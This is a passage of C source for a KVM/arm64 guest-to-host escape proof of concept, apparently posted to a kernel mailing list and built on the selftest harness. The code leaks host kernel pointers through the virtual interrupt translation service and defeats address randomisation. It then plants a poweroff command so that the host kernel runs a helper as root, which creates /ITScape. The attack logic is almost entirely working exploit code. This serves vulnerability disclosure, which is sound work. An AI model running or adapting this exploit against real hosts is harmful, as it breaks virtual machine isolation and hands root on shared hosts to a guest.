deposits, then compute the slide.
         * cpuid0 dies on its RO-text fault; the survivors read the leak back 
cleanly. */
        if (cpuid != 0) {
                u64 img = 0, voff;
                int it;
                for (it = 0; it < 4000; it++) {
                        img = guest_scan_image();
                        if (img) break;
                        GUEST_SYNC(7);
                }
                if (img) {
                        voff = (img - PMU_FN_LINKED);   /* kimage_voffset */
                        GUEST_PRINTF("cpuid%d image ptr 0x%lx -> kimage_voffset 
0x%lx\n",
                                     cpuid, (unsigned long)img, (unsigned 
long)voff);
                        if (cpuid == 1) {
                                /* let cpuid0's crashed CPU idle-switch (heal 
its leaked preempt_count) before
                                 * we churn the scheduler with the code-exec 
sweeps */
                                for (it = 0; it < 200; it++)
                                        GUEST_SYNC(7);
                                guest_exploit_rt(voff);
                                GUEST_PRINTF("WWW done (poweroff_cmd + 
orderly_poweroff planted); waiting for neigh-gc UMH\n");
                        }
                } else if (cpuid == 1) {
                        GUEST_PRINTF("cpuid1: no image ptr (leak missed this 
boot)\n");
                }
                /* cpuid1 GUEST_DONEs to heal the ops-path preempt leak 
(do_exit -> RCU advances ->
                 * neigh-gc runs the UMH). cpuid2/3 spin to keep the VM alive 
(no teardown). */
                if (cpuid == 1)
                        GUEST_DONE();
                {
                        unsigned long hb = 0;
                        for (;;) {
                                GUEST_SYNC(7);
                                if ((++hb % 200000) == 0)
                                        GUEST_PRINTF("cpuid%d alive hb=%lu\n", 
cpuid, hb);
                        }
                }
        }
#endif

        /* cpuid0 leak driver: (1) crash-free MOVI->update_affinity leak of the 
real vcpu0 kaddr (stashed
         * in leaked_v0 for cpuid1); (2) ISO-LEAK reads 
*(V+7328)=pmu.overflow_work.func (image .text) via
         * the native list_add head->prev path -> deposits the image ptr 
(cpuid1 reads it back), then
         * RO-text-faults at step4 (cpuid0 dies clean, ITS#0-isolated). */
        if (cpuid == 0) {
                int k;
#ifdef LEAK_TEST
                {
                        u64 leaked;
                        GUEST_PRINTF("leak: MOVI vcpu0 leak (gmem irq 
target_vcpu@48 <- real vcpu0)\n");
                        for (k = 0; k < 8; k++) {
                                guest_fill_read(LEAK_SENTINEL, LEAK_SENTINEL);
                                guest_send_movi(2);
                                GUEST_SYNC(4);
                                leaked = guest_scan_leak_off(LEAK_SENTINEL, 48);
                                if (leaked) {
                                        leaked_v0 = leaked;
                                        GUEST_PRINTF("leak: gmem+48 = 0x%lx 
(real vcpu0 kernel pointer)\n",
                                                     (unsigned long)leaked);
                                        break;
                                }
                        }
                        if (!leaked) {
                                GUEST_PRINTF("leak: no slot changed (reclaim 
miss this boot - retry)\n");
                                GUEST_DONE();
                        }
                        {
                                u64 V = leaked;
                                u64 tv = V + 7328 - 6656;       /* head->prev = 
*(V+7328) = pmu.overflow_work.func; lock@V+7312=0 */
                                GUEST_PRINTF("ISO-LEAK: V=0x%lx 
target_vcpu=0x%lx\n",
                                             (unsigned long)V, (unsigned 
long)tv);
                                for (k = 0; k < 8; k++) {
                                        guest_fill_read(tv, LEAK_SENTINEL);
                                        guest_send_ndev_ints(2);        /* 
native head->prev read + step4 RO fault */
                                        GUEST_SYNC(4);
                                }
                                GUEST_PRINTF("ISO-LEAK: cpuid0 survived (image 
read by cpuid1 path)\n");
                                GUEST_DONE();
                        }
                }
#endif
        }
        if (cpuid == 0)
                GUEST_DONE();
        else
                for (;;)
                        GUEST_SYNC(7);
}

static void *vcpu_worker_thread(void *data)
{
        struct kvm_vcpu *vcpu = data;
        struct ucall uc;

        while (true) {
                vcpu_run(vcpu);
                switch (get_ucall(vcpu, &uc)) {
                case UCALL_SYNC:
                        continue;
                case UCALL_PRINTF:
                        REPORT_GUEST_PRINTF(uc);
                        continue;
                case UCALL_DONE:
                        return NULL;
                case UCALL_ABORT:
                        REPORT_GUEST_ASSERT(uc);
                        break;
                default:
                        TEST_FAIL("Unknown ucall: %lu", uc.cmd);
                }
        }
        return NULL;
}

static void run_test(void)
{
        u32 nr_vcpus = test_data.nr_cpus;
        pthread_t *th = malloc(nr_vcpus * sizeof(pthread_t));
        int i;

        TEST_ASSERT(th, "thread array");
        for (i = 0; i < nr_vcpus; i++)
                pthread_create(&th[i], NULL, vcpu_worker_thread, vcpus[i]);
        for (i = 0; i < nr_vcpus; i++)
                pthread_join(th[i], NULL);
        pr_info("guest-only PoC sequence complete (inspect dmesg for KASAN)\n");
        free(th);
        /* skip kvm_vm_free(): teardown of the cross-cache-corrupted 
guest_memfd + dangling-ITE vgic
         * state can hang in the VMM. The vCPU workers have joined; _exit() 
lets the kernel close the
         * VM fd. (In the default flow the cpuid2/3 spin means this is never 
reached.) */
        fflush(NULL);
        _exit(0);
}

static void setup_memslot(void)
{
        size_t pages, sz;

        sz = (3 + test_data.nr_devices) * SZ_64K;
        sz += (1 + test_data.nr_cpus) * SZ_64K;
        sz += (3 + 2) * SZ_64K; /* ITS#1: device_table2 + collection_table2 + 
cmdq2 + itt_tables2[2] */
        pages = sz / vm->page_size;
        gpa_base = ((vm_compute_max_gfn(vm) + 1) * vm->page_size) - sz;
        vm_userspace_mem_region_add(vm, VM_MEM_SRC_ANONYMOUS, gpa_base,
                                    TEST_MEMSLOT_INDEX, pages, 0);
}

static void setup_test_data(void)
{
        size_t pages_per_64k = vm_calc_num_guest_pages(vm->mode, SZ_64K);
        u32 nr_devices = test_data.nr_devices;
        u32 nr_cpus = test_data.nr_cpus;
        gpa_t cmdq_base;

        test_data.device_table = vm_phy_pages_alloc(vm, pages_per_64k, 
gpa_base, TEST_MEMSLOT_INDEX);
        test_data.collection_table = vm_phy_pages_alloc(vm, pages_per_64k, 
gpa_base, TEST_MEMSLOT_INDEX);
        cmdq_base = vm_phy_pages_alloc(vm, pages_per_64k, gpa_base, 
TEST_MEMSLOT_INDEX);
        virt_map(vm, cmdq_base, cmdq_base, pages_per_64k);
        test_data.cmdq_base = cmdq_base;
        test_data.cmdq_base_va = (void *)cmdq_base;
        test_data.itt_tables = vm_phy_pages_alloc(vm, pages_per_64k * 
nr_devices, gpa_base, TEST_MEMSLOT_INDEX);
        test_data.lpi_prop_table = vm_phy_pages_alloc(vm, pages_per_64k, 
gpa_base, TEST_MEMSLOT_INDEX);
        virt_map(vm, test_data.lpi_prop_table, test_data.lpi_prop_table, 
pages_per_64k);
        test_data.lpi_pend_tables = vm_phy_pages_alloc(vm, pages_per_64k * 
nr_cpus, gpa_base, TEST_MEMSLOT_INDEX);
        /* ITS#1 tables */
        test_data.device_table2 = vm_phy_pages_alloc(vm, pages_per_64k, 
gpa_base, TEST_MEMSLOT_INDEX);
        test_data.collection_table2 = vm_phy_pages_alloc(vm, pages_per_64k, 
gpa_base, TEST_MEMSLOT_INDEX);
        {
                gpa_t cmdq2 = vm_phy_pages_alloc(vm, pages_per_64k, gpa_base, 
TEST_MEMSLOT_INDEX);
                virt_map(vm, cmdq2, cmdq2, pages_per_64k);
                test_data.cmdq2_base = cmdq2;
                test_data.cmdq2_base_va = (void *)cmdq2;
        }
        test_data.itt_tables2 = vm_phy_pages_alloc(vm, pages_per_64k * 2, 
gpa_base, TEST_MEMSLOT_INDEX);
        sync_global_to_guest(vm, test_data);
}

static void setup_vm(void)
{
        int i;

        vcpus = malloc(test_data.nr_cpus * sizeof(struct kvm_vcpu *));
        TEST_ASSERT(vcpus, "vCPU array");
        /* create every vCPU with KVM_ARM_VCPU_PMU_V3; the PMU INIT (below) sets
         * pmu.overflow_work.func = kvm_pmu_perf_overflow_notify_vcpu (the 
image .text ptr the leak reads
         * at vcpu+7328). VM provisioning, not an exploit action. */
        vm = __vm_create(VM_SHAPE_DEFAULT, test_data.nr_cpus, 0);
        /* the 96B vgic_irq layout, slab window and all leaked addresses assume 
a 4K guest granule */
        TEST_ASSERT(vm->page_size == 4096, "need a 4K guest granule (got %u)", 
vm->page_size);
        for (i = 0; i < test_data.nr_cpus; i++) {
                struct kvm_vcpu_init init = { .target = -1 };
                kvm_get_default_vcpu_target(vm, &init);
                init.features[0] |= (1 << KVM_ARM_VCPU_PMU_V3);
                vcpus[i] = aarch64_vcpu_add(vm, i, &init, guest_code);
        }
        kvm_arch_vm_finalize_vcpus(vm);
        vm_init_descriptor_tables(vm);
        for (i = 0; i < test_data.nr_cpus; i++)
                vcpu_init_descriptor_tables(vcpus[i]);
        vm_install_exception_handler(vm, VECTOR_IRQ_CURRENT, guest_irq_handler);
        setup_memslot();
        its_fd = vgic_its_setup(vm);
        {       /* 2nd ITS at GITS1_BASE_GPA (own cmd_lock) for cpuid1's 
code-exec */
                int its_fd2 = kvm_create_device(vm, KVM_DEV_TYPE_ARM_VGIC_ITS);
                u64 attr = GITS1_BASE_GPA;
                kvm_device_attr_set(its_fd2, KVM_DEV_ARM_VGIC_GRP_ADDR, 
KVM_VGIC_ITS_ADDR_TYPE, &attr);
                kvm_device_attr_set(its_fd2, KVM_DEV_ARM_VGIC_GRP_CTRL, 
KVM_DEV_ARM_VGIC_CTRL_INIT, NULL);
                virt_map(vm, GITS1_BASE_GPA, GITS1_BASE_GPA, 
vm_calc_num_guest_pages(vm->mode, KVM_VGIC_V3_ITS_SIZE));
        }
        for (i = 0; i < test_data.nr_cpus; i++) {
                u64 pmu_irq = 23;       /* PMU PPI (INTID 23) */
                struct kvm_device_attr irq_attr = {
                        .group = KVM_ARM_VCPU_PMU_V3_CTRL, .attr = 
KVM_ARM_VCPU_PMU_V3_IRQ,
                        .addr = (u64)&pmu_irq,
                };
                vcpu_ioctl(vcpus[i], KVM_SET_DEVICE_ATTR, &irq_attr);
                vcpu_device_attr_set(vcpus[i], KVM_ARM_VCPU_PMU_V3_CTRL, 
KVM_ARM_VCPU_PMU_V3_INIT, NULL);
        }
        setup_test_data();
        {       /* TOUCH region for cross-cache (guest_memfd) */
                size_t pages = TOUCH_SIZE / vm->page_size;
                u64 off;
                int gmem_fd;
#ifdef KVM_CAP_GUEST_MEMFD_FLAGS
                TEST_REQUIRE((vm_check_cap(vm, KVM_CAP_GUEST_MEMFD_FLAGS) &
                              (GUEST_MEMFD_FLAG_MMAP | 
GUEST_MEMFD_FLAG_INIT_SHARED)) ==
                             (GUEST_MEMFD_FLAG_MMAP | 
GUEST_MEMFD_FLAG_INIT_SHARED));
#endif
                gmem_fd = vm_create_guest_memfd(vm, TOUCH_SIZE,
                                GUEST_MEMFD_FLAG_MMAP | 
GUEST_MEMFD_FLAG_INIT_SHARED);
                vm_mem_add(vm, VM_MEM_SRC_ANONYMOUS, TOUCH_GPA, 
TOUCH_MEMSLOT_INDEX,
                           pages, KVM_MEM_GUEST_MEMFD, gmem_fd, 0);
                virt_map(vm, TOUCH_GPA, TOUCH_GPA, pages);
                (void)off;
        }
        test_data.touch_base = TOUCH_GPA;
        sync_global_to_guest(vm, test_data);
}

/*
 * ./poc: (1) drop to unprivileged uid=1000 (if root) so the root-owned 
/ITScape provably could not
 * be created by this process; (2) fork - the child creates+holds the KVM VM 
and runs the exploit
 * (cpuid2/3 spin to keep the VM alive for the post-exit neigh-gc UMH), while 
the parent (no VM fd)
 * polls for /ITScape and returns cleanly to the shell (avoiding the 
corrupted-vgic teardown hang).
 * Tunables: -v vcpus, -d devices, -e event_ids, -g gsync.
 */
int main(int argc, char **argv)
{
        int c;
        pid_t child;

        TEST_REQUIRE(kvm_supports_vgic_v3());
        TEST_REQUIRE(kvm_has_cap(KVM_CAP_ARM_PMU_V3));  /* leak source: 
pmu.overflow_work.func @ vcpu+7328 */
#ifdef KVM_CAP_GUEST_MEMFD
        TEST_REQUIRE(kvm_has_cap(KVM_CAP_GUEST_MEMFD)); /* cross-cache reclaim 
target */
#endif
        while ((c = getopt(argc, argv, "v:d:e:g:")) != -1) {
                switch (c) {
                case 'v': test_data.nr_cpus = atoi(optarg); break;
                case 'd': test_data.nr_devices = atoi(optarg); break;
                case 'e': test_data.nr_event_ids = atoi(optarg); break;
                case 'g': test_data.gsync_drain = atoi(optarg); break;
                }
        }
        TEST_ASSERT(test_data.nr_cpus >= 2, "need >= 2 vCPUs for the race");
        /* GITS1_BASE_GPA sits just above the GICR region (which scales with 
nr_cpus); reject vCPU
         * counts that would overlap the 2nd ITS -- KVM does not reject 
overlapping MMIO ranges. */
        TEST_ASSERT(GICR_BASE_GPA + (u64)test_data.nr_cpus * 
KVM_VGIC_V3_REDIST_SIZE <= GITS1_BASE_GPA,
                    "nr_cpus=%u overlaps the GICR region with the 2nd ITS at 
%#llx (max 7 with this fixed "
                    "GITS1_BASE_GPA); lower -v", test_data.nr_cpus, (unsigned 
long long)GITS1_BASE_GPA);

        /* Run unprivileged when possible: only drop to uid=1000 if launched as 
root AND /dev/kvm is
         * world-accessible (so the unprivileged process can still open it). On 
a normal host where
         * /dev/kvm is root/kvm-only, stay as-is so the PoC still runs (as 
root, or as a kvm-group user). */
        if (getuid() == 0) {
                struct stat ks;
                if (stat("/dev/kvm", &ks) == 0 && (ks.st_mode & 06) == 06) {
                        setgroups(0, NULL);
                        if (setgid(1000) == 0 && setuid(1000) == 0)
                                pr_info("[*] dropped to unprivileged uid=%d\n", 
(int)getuid());
                }
        }
        pr_info("=== vgic_its_guest_escape vcpus=%u dev=%u ev=%u uid=%d ===\n",
                test_data.nr_cpus, test_data.nr_devices, 
test_data.nr_event_ids, (int)getuid());

        child = fork();
        if (child == 0) {
                setup_vm();
                run_test();             /* never returns: the child holds the 
VM open */
                _exit(0);
        }
        TEST_ASSERT(child > 0, "fork");

        /* the planted UMH execs an absolute path verbatim (no PATH lookup); 
warn early if the target
         * rootfs lacks it, so a clean miss is not misread as a cross-cache 
miss. */
        {
                struct stat ts;
                if (stat("/bin/touch", &ts) != 0)
                        pr_info("[!] /bin/touch missing here: the planted UMH 
cannot create /ITScape "
                                "(re-target the command path in 
scw[]/SC_WRITES[]).\n");
        }
        pr_info("[*] exploit running - waiting for the host kernel to create 
/ITScape as root (up to ~150s)...\n");
        fflush(NULL);
        for (c = 0; c < 300; c++) {
                struct stat st;
                if (stat("/ITScape", &st) == 0) {
                        pr_info("\n[+] /ITScape created by the host kernel 
(owner uid=%d). verify:  ls -la /ITScape\n",
                                (int)st.st_uid);
                        fflush(NULL);
                        return 0;
                }
                usleep(500000);
                if (c == 60 || c == 160 || c == 260) { pr_info("[*] still 
working (%ds)...\n", c / 2); fflush(NULL); }
        }
        pr_info("\n[-] /ITScape not created this boot (cross-cache miss, or the 
target lacks /bin/touch "
                "or has a read-only root). 'poweroff -f' and re-run.\n");
        fflush(NULL);
        kill(child, SIGKILL);
        return 1;
}

Reply via email to